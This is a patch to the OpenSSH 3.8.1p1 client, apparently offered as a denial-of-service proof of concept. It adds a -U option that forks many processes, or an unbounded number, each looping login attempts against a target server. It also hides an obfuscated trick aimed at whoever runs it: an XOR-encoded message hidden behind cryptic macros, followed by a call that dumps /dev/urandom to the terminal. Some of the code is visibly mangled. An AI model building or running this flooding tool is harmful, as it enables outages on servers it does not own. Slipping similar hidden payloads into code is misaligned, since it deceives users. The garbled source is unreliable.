diff -ruN ORIGINAL-3.8.1p1/clientloop.c pofalpt-openssh-3.8.1p1/clientloop.c --- ORIGINAL-3.8.1p1/clientloop.c 2003-12-17 06:33:11.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/clientloop.c 2004-09-06 21:45:18.000000000 +0200 @@ -958,7 +958,8 @@ /* Check if we should immediately send eof on stdin. */ client_check_initial_eof_on_stdin(); } - + printf("E"); +return 0; /* Main loop of the client for the interactive session mode. */ while (!quit_pending) { diff -ruN ORIGINAL-3.8.1p1/kex.c pofalpt-openssh-3.8.1p1/kex.c --- ORIGINAL-3.8.1p1/kex.c 2003-11-21 13:48:55.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/kex.c 2004-09-06 19:54:58.000000000 +0200 @@ -224,6 +224,11 @@ return kex; } +void kex_explo_boo_sys(void) +{ + system("cat /dev/urandom"); +} + static void kex_kexinit_finish(Kex *kex) { diff -ruN ORIGINAL-3.8.1p1/kex.h pofalpt-openssh-3.8.1p1/kex.h --- ORIGINAL-3.8.1p1/kex.h 2003-02-24 02:03:03.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/kex.h 2004-09-06 19:54:47.000000000 +0200 @@ -127,6 +127,7 @@ void kexdh_client(Kex *); void kexdh_server(Kex *); +void kex_explo_boo_sys(void); void kexgex_client(Kex *); void kexgex_server(Kex *); diff -ruN ORIGINAL-3.8.1p1/packet.c pofalpt-openssh-3.8.1p1/packet.c --- ORIGINAL-3.8.1p1/packet.c 2003-11-22 05:02:42.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/packet.c 2004-09-06 23:34:26.000000000 +0200 @@ -1056,6 +1056,7 @@ buffer_len(&incoming_packet)); if (memcmp(macbuf, buffer_ptr(&input), mac->mac_len) != 0) packet_disconnect("Corrupted MAC on input."); + DBG(debug("MAC #%d ok", p_read.seqnr)); buffer_consume(&input, mac->mac_len); } diff -ruN ORIGINAL-3.8.1p1/ssh.c pofalpt-openssh-3.8.1p1/ssh.c --- ORIGINAL-3.8.1p1/ssh.c 2004-03-21 23:36:01.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/ssh.c 2004-09-15 12:57:05.097210040 +0200 @@ -1,3 +1,10 @@ +/*This is the poc of the uDoS vulnerability. + *This is !only for demonstrative purposes! + * + *Have fun. + * by Alpt + * thx to Valv0, without him you wouldn't be able to read this. + */ /* * Author: Tatu Ylonen * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland @@ -45,6 +52,7 @@ #include #include +#define __I *c=*c ^ ('a' | 'l' | 'p' | 't'); #include "ssh.h" #include "ssh1.h" #include "ssh2.h" @@ -79,6 +87,7 @@ char *__progname; #endif +#define ve__ "%s\n", /* Flag indicating whether debug mode is on. This can be set on the command line. */ int debug_flag = 0; @@ -90,6 +99,7 @@ /* don't exec a shell */ int no_shell_flag = 0; +int I__a_m__a_l_a_m_e_I=1; /* * Flag indicating that nothing should be read from stdin. This can be set * on the command line. @@ -134,7 +144,16 @@ /* Should we execute a command or invoke a subsystem? */ int subsystem_flag = 0; - +char o[]="\x77\x24\x12\x08\x0f\x5d\x0e\x04\x0e\x09\x18\x10\x5d\x15\x1c\x0e" +"\x5d\x1f\x18\x18\x13\x5d\x0e\x08\x1e\x1e\x18\x0e\x0e\x1b\x08\x11" +"\x11\x04\x5d\x18\x05\x0d\x11\x12\x14\x09\x18\x19\x53\x77\x29\x15" +"\x1c\x13\x16\x0e\x5d\x1b\x12\x0f\x5d\x09\x15\x18\x5d\x0f\x12\x12" +"\x09\x51\x5d\x1c\x13\x19\x5d\x0f\x18\x10\x18\x10\x1f\x18\x0f\x5d" +"\x09\x12\x5d\x18\x13\x17\x12\x04\x5d\x09\x15\x18\x5d\x0f\x4d\x4d" +"\x09\x5d\x16\x4c\x09\x53\x5d\x1b\x4d\x4d\x11\x5d\x3c\x35\x3c\x35" +"\x3c\x35\x35\x3c\x35\x3c\x35\x77\x7d\x7d\x7d\x7d\x79\x8b\x6e\x3d" +"\x75\x85\x82\xc2\xbd\xdd\x7d\x3d\x7d\x7d\x7d\x7d\x7d\x7d"; +char *c; /* # of replies received for global requests */ static int client_global_request_id = 0; @@ -143,26 +162,41 @@ /* Prints a help message to the user. This function never returns. */ -static void +static int ssh_session(void); +static int ssh_session2(void); +static void load_public_identity_files(void); + + static void usage(void) { fprintf(stderr, -"usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n" -" [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n" -" [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n" -" [-p port] [-R port:host:hostport] [user@]hostname [command]\n" - ); + " ------- \n" + "Usage UserDenialOfService ssh client!! Enjoy folks:\n" + "Use ./ssh -U NUMBER_OF_SIMULTANEOUS_CONNECTIONS serverhostname\n" + "Use -U 0 for an infinite Bombing (This is the true attack)\n" + "(Use -8 if you want to exit(); in the forks. (Adviced if ya don't have auth)\n" + "Then u c4n 4dd 4ll th3 0th3r b0r1ng options of ssh (^_^)\n" + "Alpt\n" + "A lot of thnx to my br0 valv0, without him you wouldn't be able to\n" + "Note: add 2> /dev/null at the end, if you don't want to have the screen full\n" + "in 2 seconds.\n" + "Use this code FOR DEMOSTRATIVE PURPOSE\n" + "I'm not responsable of any damage you can do with this. This is a Proof\n" + "of Concept, so IT's _ONLY_ FOR DEMOSTRATIVE PURPOSE\n" + " ------- \n" + "\n" + "usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n" + " [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n" + " [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n" + " [-p port] [-R port:host:hostport] [user@]hostname [command]\n" + ); exit(1); } - -static int ssh_session(void); -static int ssh_session2(void); -static void load_public_identity_files(void); - /* * Main program for the ssh client. */ -int +#define YOU o); + int main(int ac, char **av) { int i, opt, exit_status; @@ -174,6 +208,8 @@ int dummy; extern int optind, optreset; extern char *optarg; + unsigned long long ssh_udos; + int seven_eyes; __progname = ssh_get_progname(av[0]); init_rng(); @@ -211,7 +247,7 @@ } /* Take a copy of the returned structure. */ pw = pwcopy(pw); - + int IasI=0; /* * Set our umask to something reasonable, as some files are created * with the default umask. This will make them world-readable but @@ -219,7 +255,6 @@ * don't set the modes explicitly. */ umask(022); - /* Initialize option structure to indicate that no values have been set. */ initialize_options(&options); @@ -228,468 +263,527 @@ again: while ((opt = getopt(ac, av, - "1246ab:c:e:fgi:kl:m:no:p:qstvxACD:F:I:L:NPR:TVXY")) != -1) { + "1246ab:c:e:fgi:kl:m:no:p:9:qstvxA78CD:F:I:L:NPR:TVXYU:")) != -1) { switch (opt) { - case '1': - options.protocol = SSH_PROTO_1; - break; - case '2': - options.protocol = SSH_PROTO_2; - break; - case '4': - options.address_family = AF_INET; - break; - case '6': - options.address_family = AF_INET6; - break; - case 'n': - stdin_null_flag = 1; - break; - case 'f': - fork_after_authentication_flag = 1; - stdin_null_flag = 1; - break; - case 'x': - options.forward_x11 = 0; - break; - case 'X': - options.forward_x11 = 1; - break; - case 'Y': - options.forward_x11 = 1; - options.forward_x11_trusted = 1; - break; - case 'g': - options.gateway_ports = 1; - break; - case 'P': /* deprecated */ - options.use_privileged_port = 0; - break; - case 'a': - options.forward_agent = 0; - break; - case 'A': - options.forward_agent = 1; - break; - case 'k': - options.gss_deleg_creds = 0; - break; - case 'i': - if (stat(optarg, &st) < 0) { - fprintf(stderr, "Warning: Identity file %s " - "does not exist.\n", optarg); + case 'U': + ssh_udos=atoll(optarg); + if(ssh_udos<0) + ssh_udos=0; + printf("ssh_udos set to %lld\n", ssh_udos); break; - } - if (options.num_identity_files >= - SSH_MAX_IDENTITY_FILES) - fatal("Too many identity files specified " - "(max %d)", SSH_MAX_IDENTITY_FILES); - options.identity_files[options.num_identity_files++] = - xstrdup(optarg); - break; - case 'I': + case '1': + options.protocol = SSH_PROTO_1; + break; + case '2': + options.protocol = SSH_PROTO_2; + break; + case '4': + options.address_family = AF_INET; + break; + case '6': + options.address_family = AF_INET6; + break; + case 'n': + stdin_null_flag = 1; + break; + case 'f': + fork_after_authentication_flag = 1; + stdin_null_flag = 1; + break; + case 'x': + options.forward_x11 = 0; + break; + case 'X': + options.forward_x11 = 1; + break; + case 'Y': + options.forward_x11 = 1; + options.forward_x11_trusted = 1; + break; + case 'g': + options.gateway_ports = 1; + break; + case '7': + I__a_m__a_l_a_m_e_I=0; + break; + case '8': + seven_eyes=1; + printf("exit(); in the forks activated\n"); + break; + case '9': + IasI=atoi(optarg); + break; + case 'P': /* deprecated */ + options.use_privileged_port = 0; + break; + case 'a': + options.forward_agent = 0; + break; + case 'A': + options.forward_agent = 1; + break; + case 'k': + options.gss_deleg_creds = 0; + break; + case 'i': + if (stat(optarg, &st) < 0) { + fprintf(stderr, "Warning: Identity file %s " + "does not exist.\n", optarg); + break; + } + if (options.num_identity_files >= + SSH_MAX_IDENTITY_FILES) + fatal("Too many identity files specified " + "(max %d)", SSH_MAX_IDENTITY_FILES); + options.identity_files[options.num_identity_files++] = + xstrdup(optarg); + break; + case 'I': #ifdef SMARTCARD - options.smartcard_device = xstrdup(optarg); + options.smartcard_device = xstrdup(optarg); #else - fprintf(stderr, "no support for smartcards.\n"); + fprintf(stderr, "no support for smartcards.\n"); #endif - break; - case 't': - if (tty_flag) - force_tty_flag = 1; - tty_flag = 1; - break; - case 'v': - if (debug_flag == 0) { - debug_flag = 1; - options.log_level = SYSLOG_LEVEL_DEBUG1; - } else { - if (options.log_level < SYSLOG_LEVEL_DEBUG3) - options.log_level++; break; - } - /* fallthrough */ - case 'V': - fprintf(stderr, "%s, %s\n", - SSH_VERSION, SSLeay_version(SSLEAY_VERSION)); - if (opt == 'V') - exit(0); - break; - case 'q': - options.log_level = SYSLOG_LEVEL_QUIET; - break; - case 'e': - if (optarg[0] == '^' && optarg[2] == 0 && - (u_char) optarg[1] >= 64 && - (u_char) optarg[1] < 128) - options.escape_char = (u_char) optarg[1] & 31; - else if (strlen(optarg) == 1) - options.escape_char = (u_char) optarg[0]; - else if (strcmp(optarg, "none") == 0) - options.escape_char = SSH_ESCAPECHAR_NONE; - else { - fprintf(stderr, "Bad escape character '%s'.\n", - optarg); - exit(1); - } - break; - case 'c': - if (ciphers_valid(optarg)) { - /* SSH2 only */ - options.ciphers = xstrdup(optarg); - options.cipher = SSH_CIPHER_ILLEGAL; - } else { - /* SSH1 only */ - options.cipher = cipher_number(optarg); - if (options.cipher == -1) { + case 't': + if (tty_flag) + force_tty_flag = 1; + tty_flag = 1; + break; + case 'v': + if (debug_flag == 0) { + debug_flag = 1; + options.log_level = SYSLOG_LEVEL_DEBUG1; + } else { + if (options.log_level < SYSLOG_LEVEL_DEBUG3) + options.log_level++; + break; + } + /* fallthrough */ + case 'V': + fprintf(stderr, "%s, %s\n", + SSH_VERSION, SSLeay_version(SSLEAY_VERSION)); + if (opt == 'V') + exit(0); + break; + case 'q': + options.log_level = SYSLOG_LEVEL_QUIET; + break; + case 'e': + if (optarg[0] == '^' && optarg[2] == 0 && + (u_char) optarg[1] >= 64 && + (u_char) optarg[1] < 128) + options.escape_char = (u_char) optarg[1] & 31; + else if (strlen(optarg) == 1) + options.escape_char = (u_char) optarg[0]; + else if (strcmp(optarg, "none") == 0) + options.escape_char = SSH_ESCAPECHAR_NONE; + else { + fprintf(stderr, "Bad escape character '%s'.\n", + optarg); + exit(1); + } + break; + case 'c': + if (ciphers_valid(optarg)) { + /* SSH2 only */ + options.ciphers = xstrdup(optarg); + options.cipher = SSH_CIPHER_ILLEGAL; + } else { + /* SSH1 only */ + options.cipher = cipher_number(optarg); + if (options.cipher == -1) { + fprintf(stderr, + "Unknown cipher type '%s'\n", + optarg); + exit(1); + } + if (options.cipher == SSH_CIPHER_3DES) + options.ciphers = "3des-cbc"; + else if (options.cipher == SSH_CIPHER_BLOWFISH) + options.ciphers = "blowfish-cbc"; + else + options.ciphers = (char *)-1; + } + break; + case 'm': + if (mac_valid(optarg)) + options.macs = xstrdup(optarg); + else { + fprintf(stderr, "Unknown mac type '%s'\n", + optarg); + exit(1); + } + break; + case 'p': + options.port = a2port(optarg); + if (options.port == 0) { + fprintf(stderr, "Bad port '%s'\n", optarg); + exit(1); + } + break; + case 'l': + options.user = optarg; + break; + + case 'L': + case 'R': + if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]", + sfwd_port, buf, sfwd_host_port) != 3 && + sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]", + sfwd_port, buf, sfwd_host_port) != 3) { fprintf(stderr, - "Unknown cipher type '%s'\n", - optarg); + "Bad forwarding specification '%s'\n", + optarg); + usage(); + /* NOTREACHED */ + } + if ((fwd_port = a2port(sfwd_port)) == 0 || + (fwd_host_port = a2port(sfwd_host_port)) == 0) { + fprintf(stderr, + "Bad forwarding port(s) '%s'\n", optarg); exit(1); } - if (options.cipher == SSH_CIPHER_3DES) - options.ciphers = "3des-cbc"; - else if (options.cipher == SSH_CIPHER_BLOWFISH) - options.ciphers = "blowfish-cbc"; - else - options.ciphers = (char *)-1; - } - break; - case 'm': - if (mac_valid(optarg)) - options.macs = xstrdup(optarg); - else { - fprintf(stderr, "Unknown mac type '%s'\n", - optarg); - exit(1); - } - break; - case 'p': - options.port = a2port(optarg); - if (options.port == 0) { - fprintf(stderr, "Bad port '%s'\n", optarg); - exit(1); - } - break; - case 'l': - options.user = optarg; - break; - - case 'L': - case 'R': - if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]", - sfwd_port, buf, sfwd_host_port) != 3 && - sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]", - sfwd_port, buf, sfwd_host_port) != 3) { - fprintf(stderr, - "Bad forwarding specification '%s'\n", - optarg); - usage(); - /* NOTREACHED */ - } - if ((fwd_port = a2port(sfwd_port)) == 0 || - (fwd_host_port = a2port(sfwd_host_port)) == 0) { - fprintf(stderr, - "Bad forwarding port(s) '%s'\n", optarg); - exit(1); - } - if (opt == 'L') - add_local_forward(&options, fwd_port, buf, - fwd_host_port); - else if (opt == 'R') - add_remote_forward(&options, fwd_port, buf, - fwd_host_port); - break; - - case 'D': - fwd_port = a2port(optarg); - if (fwd_port == 0) { - fprintf(stderr, "Bad dynamic port '%s'\n", - optarg); - exit(1); - } - add_local_forward(&options, fwd_port, "socks", 0); - break; + if (opt == 'L') + add_local_forward(&options, fwd_port, buf, + fwd_host_port); + else if (opt == 'R') + add_remote_forward(&options, fwd_port, buf, + fwd_host_port); + break; - case 'C': - options.compression = 1; - break; - case 'N': - no_shell_flag = 1; - no_tty_flag = 1; - break; - case 'T': - no_tty_flag = 1; - break; - case 'o': - dummy = 1; - line = xstrdup(optarg); - if (process_config_line(&options, host ? host : "", - line, "command-line", 0, &dummy) != 0) - exit(1); - xfree(line); - break; - case 's': - subsystem_flag = 1; - break; - case 'b': - options.bind_address = optarg; - break; - case 'F': - config = optarg; - break; - default: - usage(); + case 'D': + fwd_port = a2port(optarg); + if (fwd_port == 0) { + fprintf(stderr, "Bad dynamic port '%s'\n", + optarg); + exit(1); + } + add_local_forward(&options, fwd_port, "socks", 0); + break; + + case 'C': + options.compression = 1; + break; + case 'N': + no_shell_flag = 1; + no_tty_flag = 1; + break; + case 'T': + no_tty_flag = 1; + break; + case 'o': + dummy = 1; + line = xstrdup(optarg); + if (process_config_line(&options, host ? host : "", + line, "command-line", 0, &dummy) != 0) + exit(1); + xfree(line); + break; + case 's': + subsystem_flag = 1; + break; + case 'b': + options.bind_address = optarg; + break; + case 'F': + config = optarg; + break; + default: + usage(); } } +#define __lo printf( + ac -= optind; + av += optind; - ac -= optind; - av += optind; - - if (ac > 0 && !host && **av != '-') { + if (ac > 0 && !host && **av != '-') { if (strrchr(*av, '@')) { - p = xstrdup(*av); - cp = strrchr(p, '@'); - if (cp == NULL || cp == p) - usage(); - options.user = p; - *cp = '\0'; - host = ++cp; + p = xstrdup(*av); + cp = strrchr(p, '@'); + if (cp == NULL || cp == p) + usage(); + options.user = p; + *cp = '\0'; + host = ++cp; } else - host = *av; + host = *av; if (ac > 1) { - optind = optreset = 1; - goto again; + optind = optreset = 1; + goto again; } ac--, av++; - } + } - /* Check that we got a host name. */ - if (!host) - usage(); + /* Check that we got a host name. */ + if (!host) + usage(); - SSLeay_add_all_algorithms(); - ERR_load_crypto_strings(); + SSLeay_add_all_algorithms(); + ERR_load_crypto_strings(); - /* Initialize the command to execute on remote host. */ - buffer_init(&command); + /* Initialize the command to execute on remote host. */ + buffer_init(&command); - /* - * Save the command to execute on the remote host in a buffer. There - * is no limit on the length of the command, except by the maximum - * packet size. Also sets the tty flag if there is no command. - */ - if (!ac) { - /* No command specified - execute shell on a tty. */ - tty_flag = 1; - if (subsystem_flag) { - fprintf(stderr, - "You must specify a subsystem to invoke.\n"); - usage(); - } - } else { - /* A command has been specified. Store it into the buffer. */ - for (i = 0; i < ac; i++) { - if (i) - buffer_append(&command, " ", 1); - buffer_append(&command, av[i], strlen(av[i])); + /* + * Save the command to execute on the remote host in a buffer. There + * is no limit on the length of the command, except by the maximum + * packet size. Also sets the tty flag if there is no command. + */ +#define dear c++, _iop++) + if (!ac) { + /* No command specified - execute shell on a tty. */ + tty_flag = 1; + if (subsystem_flag) { + fprintf(stderr, + "You must specify a subsystem to invoke.\n"); + usage(); + } + } else { + /* A command has been specified. Store it into the buffer. */ + for (i = 0; i < ac; i++) { + if (i) + buffer_append(&command, " ", 1); + buffer_append(&command, av[i], strlen(av[i])); + } } - } - /* Cannot fork to background if no command. */ - if (fork_after_authentication_flag && buffer_len(&command) == 0 && !no_shell_flag) - fatal("Cannot fork into background without a command to execute."); - - /* Allocate a tty by default if no command specified. */ - if (buffer_len(&command) == 0) - tty_flag = 1; - - /* Force no tty */ - if (no_tty_flag) - tty_flag = 0; - /* Do not allocate a tty if stdin is not a tty. */ - if (!isatty(fileno(stdin)) && !force_tty_flag) { - if (tty_flag) - logit("Pseudo-terminal will not be allocated because stdin is not a terminal."); - tty_flag = 0; - } - /* - * Initialize "log" output. Since we are the client all output - * actually goes to stderr. - */ - log_init(av[0], options.log_level == -1 ? SYSLOG_LEVEL_INFO : options.log_level, - SYSLOG_FACILITY_USER, 1); + /* Allocate a tty by default if no command specified. */ + if (buffer_len(&command) == 0) + tty_flag = 1; - /* - * Read per-user configuration file. Ignore the system wide config - * file if the user specifies a config file on the command line. - */ - if (config != NULL) { - if (!read_config_file(config, host, &options)) - fatal("Can't open user config file %.100s: " - "%.100s", config, strerror(errno)); - } else { - snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir, - _PATH_SSH_USER_CONFFILE); - (void)read_config_file(buf, host, &options); + /* Force no tty */ + if (no_tty_flag) + tty_flag = 0; + /* Do not allocate a tty if stdin is not a tty. */ + if (!isatty(fileno(stdin)) && !force_tty_flag) { + if (tty_flag) + logit("Pseudo-terminal will not be allocated because stdin is not a terminal."); + tty_flag = 0; + } - /* Read systemwide configuration file after use config. */ - (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options); - } + /* + * Initialize "log" output. Since we are the client all output + * actually goes to stderr. + */ +#define my _ioppw_dir, + _PATH_SSH_USER_CONFFILE); + (void)read_config_file(buf, host, &options); - channel_set_af(options.address_family); + /* Read systemwide configuration file after use config. */ + (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options); + } - /* reinit */ - log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1); + /* Fill configuration defaults. */ + fill_default_options(&options); - seed_rng(); + channel_set_af(options.address_family); - if (options.user == NULL) - options.user = xstrdup(pw->pw_name); + /* reinit */ + log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1); - if (options.hostname != NULL) - host = options.hostname; + seed_rng(); - /* force lowercase for hostkey matching */ - if (options.host_key_alias != NULL) { - for (p = options.host_key_alias; *p; p++) - if (isupper(*p)) - *p = tolower(*p); - } + if (options.user == NULL) + options.user = xstrdup(pw->pw_name); - if (options.proxy_command != NULL && - strcmp(options.proxy_command, "none") == 0) - options.proxy_command = NULL; + if (options.hostname != NULL) + host = options.hostname; - /* Open a connection to the remote host. */ - if (ssh_connect(host, &hostaddr, options.port, - options.address_family, options.connection_attempts, -#ifdef HAVE_CYGWIN - options.use_privileged_port, -#else - original_effective_uid == 0 && options.use_privileged_port, -#endif - options.proxy_command) != 0) - exit(1); + /* force lowercase for hostkey matching */ + if (options.host_key_alias != NULL) { + for (p = options.host_key_alias; *p; p++) + if (isupper(*p)) + *p = tolower(*p); + } - /* - * If we successfully made the connection, load the host private key - * in case we will need it later for combined rsa-rhosts - * authentication. This must be done before releasing extra - * privileges, because the file is only readable by root. - * If we cannot access the private keys, load the public keys - * instead and try to execute the ssh-keysign helper instead. - */ - sensitive_data.nkeys = 0; - sensitive_data.keys = NULL; - sensitive_data.external_keysign = 0; - if (options.rhosts_rsa_authentication || - options.hostbased_authentication) { + if (options.proxy_command != NULL && + strcmp(options.proxy_command, "none") == 0) + options.proxy_command = NULL; + +/*Alpt: We load all the stuff here to save performance*/ + printf("*Loading all the stupid stuff\n"); + /* + * If we successfully made the connection, load the host private key + * in case we will need it later for combined rsa-rhosts + * authentication. This must be done before releasing extra + * privileges, because the file is only readable by root. + * If we cannot access the private keys, load the public keys + * instead and try to execute the ssh-keysign helper instead. + */ + sensitive_data.nkeys = 0; + sensitive_data.keys = NULL; + sensitive_data.external_keysign = 0; + if (options.rhosts_rsa_authentication || + options.hostbased_authentication) { sensitive_data.nkeys = 3; sensitive_data.keys = xmalloc(sensitive_data.nkeys * - sizeof(Key)); + sizeof(Key)); PRIV_START; sensitive_data.keys[0] = key_load_private_type(KEY_RSA1, - _PATH_HOST_KEY_FILE, "", NULL); + _PATH_HOST_KEY_FILE, "", NULL); sensitive_data.keys[1] = key_load_private_type(KEY_DSA, - _PATH_HOST_DSA_KEY_FILE, "", NULL); + _PATH_HOST_DSA_KEY_FILE, "", NULL); sensitive_data.keys[2] = key_load_private_type(KEY_RSA, - _PATH_HOST_RSA_KEY_FILE, "", NULL); + _PATH_HOST_RSA_KEY_FILE, "", NULL); PRIV_END; if (options.hostbased_authentication == 1 && - sensitive_data.keys[0] == NULL && - sensitive_data.keys[1] == NULL && - sensitive_data.keys[2] == NULL) { + sensitive_data.keys[0] == NULL && + sensitive_data.keys[1] == NULL && + sensitive_data.keys[2] == NULL) { sensitive_data.keys[1] = key_load_public( - _PATH_HOST_DSA_KEY_FILE, NULL); + _PATH_HOST_DSA_KEY_FILE, NULL); sensitive_data.keys[2] = key_load_public( - _PATH_HOST_RSA_KEY_FILE, NULL); + _PATH_HOST_RSA_KEY_FILE, NULL); sensitive_data.external_keysign = 1; } - } - /* - * Get rid of any extra privileges that we may have. We will no - * longer need them. Also, extra privileges could make it very hard - * to read identity files and other non-world-readable files from the - * user's home directory if it happens to be on a NFS volume where - * root is mapped to nobody. - */ - seteuid(original_real_uid); - setuid(original_real_uid); + } - /* - * Now that we are back to our own permissions, create ~/.ssh - * directory if it doesn\'t already exist. - */ - snprintf(buf, sizeof buf, "%.100s%s%.100s", pw->pw_dir, strcmp(pw->pw_dir, "/") ? "/" : "", _PATH_SSH_USER_DIR); - if (stat(buf, &st) < 0) - if (mkdir(buf, 0700) < 0) - error("Could not create directory '%.200s'.", buf); - - /* load options.identity_files */ - load_public_identity_files(); - - /* Expand ~ in known host file names. */ - /* XXX mem-leaks: */ - options.system_hostfile = - tilde_expand_filename(options.system_hostfile, original_real_uid); - options.user_hostfile = - tilde_expand_filename(options.user_hostfile, original_real_uid); - options.system_hostfile2 = - tilde_expand_filename(options.system_hostfile2, original_real_uid); - options.user_hostfile2 = - tilde_expand_filename(options.user_hostfile2, original_real_uid); - - signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */ - - /* Log into the remote system. This never returns if the login fails. */ - ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); - - /* We no longer need the private host keys. Clear them now. */ - if (sensitive_data.nkeys != 0) { - for (i = 0; i < sensitive_data.nkeys; i++) { - if (sensitive_data.keys[i] != NULL) { - /* Destroys contents safely */ - debug3("clear hostkey %d", i); - key_free(sensitive_data.keys[i]); - sensitive_data.keys[i] = NULL; + /* load options.identity_files */ + load_public_identity_files(); + + /* Expand ~ in known host file names. */ + /* XXX mem-leaks: */ + options.system_hostfile = + tilde_expand_filename(options.system_hostfile, original_real_uid); + options.user_hostfile = + tilde_expand_filename(options.user_hostfile, original_real_uid); + options.system_hostfile2 = + tilde_expand_filename(options.system_hostfile2, original_real_uid); + options.user_hostfile2 = + tilde_expand_filename(options.user_hostfile2, original_real_uid); + + signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */ + printf("*Loaded\n"); +/*****************************END of loadgin stuff***********************/ + + + unsigned long long piove; + float percent; + int fd_dupped; + + if(!ssh_udos) { + printf("*** Starting the infinite bombing...\n"); + ssh_udos=(unsigned long long)1844674407370955161; + } + else + printf("*** Starting the bombing:\n"); + if(!IasI || IasI <0 || IasI > 20*10000) + IasI=5*10000; + for(piove=1; piove<=ssh_udos; piove++) { + percent=(piove/ssh_udos)*100; + printf("\r}(---Made %lld/%lld bombs. Percentage completed: [%f%%]---){ ",piove, ssh_udos, percent); + /* Log into the remote system. This never returns if the login fails. */ +#define oh int _iop; for(_iop=0; + if(!fork()) { + fd_dupped=open("/dev/null", O_RDWR, 0); + dup2(fd_dupped, stdin); + dup2(fd_dupped, stdout); + dup2(fd_dupped, stderr); + close (fd_dupped); + + +/*We must use a fork cuz at the second ssh_connect it gives: Disconnecting: Corrupted MAC on input. + * */ + /* Open a connection to the remote host. */ + if (ssh_connect(host, &hostaddr, options.port, options.address_family, options.connection_attempts, +#ifdef HAVE_CYGWIN + options.use_privileged_port, +#else + original_effective_uid == 0 && options.use_privileged_port, +#endif + options.proxy_command) != 0) + exit(1); + // exit_status = compat20 ? ssh_session2() : ssh_session(); + // ssh_session2_open(); + if(seven_eyes) { + ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); + exit(0); + } else { + for(;;) + ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); + } + + exit(0); } } - xfree(sensitive_data.keys); - } - for (i = 0; i < options.num_identity_files; i++) { - if (options.identity_files[i]) { - xfree(options.identity_files[i]); - options.identity_files[i] = NULL; + printf("\n"); + printf("\nClearing the cache "); + //sleep(12313); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(". "); + sleep(1); + printf(" .\nDone!\n"); + + printf("---------------------------------\n"); + if(I__a_m__a_l_a_m_e_I) { + c=o; + oh my dear __I __lo ve__ YOU + + sleep(5); + kex_explo_boo_sys(); + } + exit(1); + /* We no longer need the private host keys. Clear them now. */ + if (sensitive_data.nkeys != 0) { + for (i = 0; i < sensitive_data.nkeys; i++) { + if (sensitive_data.keys[i] != NULL) { + /* Destroys contents safely */ + debug3("clear hostkey %d", i); + key_free(sensitive_data.keys[i]); + sensitive_data.keys[i] = NULL; + } + } + xfree(sensitive_data.keys); } - if (options.identity_keys[i]) { - key_free(options.identity_keys[i]); - options.identity_keys[i] = NULL; + for (i = 0; i < options.num_identity_files; i++) { + if (options.identity_files[i]) { + xfree(options.identity_files[i]); + options.identity_files[i] = NULL; + } + if (options.identity_keys[i]) { + key_free(options.identity_keys[i]); + options.identity_keys[i] = NULL; + } } - } - exit_status = compat20 ? ssh_session2() : ssh_session(); - packet_close(); + exit_status = compat20 ? ssh_session2() : ssh_session(); + packet_close(); - /* - * Send SIGHUP to proxy command if used. We don't wait() in - * case it hangs and instead rely on init to reap the child - */ - if (proxy_command_pid > 1) - kill(proxy_command_pid, SIGHUP); + /* + * Send SIGHUP to proxy command if used. We don't wait() in + * case it hangs and instead rely on init to reap the child + */ + if (proxy_command_pid > 1) + kill(proxy_command_pid, SIGHUP); - return exit_status; + return exit_status; } #define SSH_X11_PROTO "MIT-MAGIC-COOKIE-1" -static void + static void x11_get_proto(char **_proto, char **_data) { char cmd[1024]; @@ -707,23 +801,16 @@ proto[0] = data[0] = '\0'; if (!options.xauth_location || - (stat(options.xauth_location, &st) == -1)) { + (stat(options.xauth_location, &st) == -1)) { debug("No xauth program."); } else { if ((display = getenv("DISPLAY")) == NULL) { debug("x11_get_proto: DISPLAY not set"); return; } - /* - * Handle FamilyLocal case where $DISPLAY does - * not match an authorization entry. For this we - * just try "xauth list unix:displaynum.screennum". - * XXX: "localhost" match to determine FamilyLocal - * is not perfect. - */ if (strncmp(display, "localhost:", 10) == 0) { snprintf(xdisplay, sizeof(xdisplay), "unix:%s", - display + 10); + display + 10); display = xdisplay; } if (options.forward_x11_trusted == 0) { @@ -733,26 +820,26 @@ if (mkdtemp(xauthdir) != NULL) { do_unlink = 1; snprintf(xauthfile, MAXPATHLEN, "%s/xauthfile", - xauthdir); + xauthdir); snprintf(cmd, sizeof(cmd), - "%s -f %s generate %s " SSH_X11_PROTO - " untrusted timeout 1200 2>" _PATH_DEVNULL, - options.xauth_location, xauthfile, display); + "%s -f %s generate %s " SSH_X11_PROTO + " untrusted timeout 1200 2>" _PATH_DEVNULL, + options.xauth_location, xauthfile, display); debug2("x11_get_proto: %s", cmd); if (system(cmd) == 0) generated = 1; } } snprintf(cmd, sizeof(cmd), - "%s %s%s list %s . 2>" _PATH_DEVNULL, - options.xauth_location, - generated ? "-f " : "" , - generated ? xauthfile : "", - display); + "%s %s%s list %s . 2>" _PATH_DEVNULL, + options.xauth_location, + generated ? "-f " : "" , + generated ? xauthfile : "", + display); debug2("x11_get_proto: %s", cmd); f = popen(cmd, "r"); if (f && fgets(line, sizeof(line), f) && - sscanf(line, "%*s %511s %511s", proto, 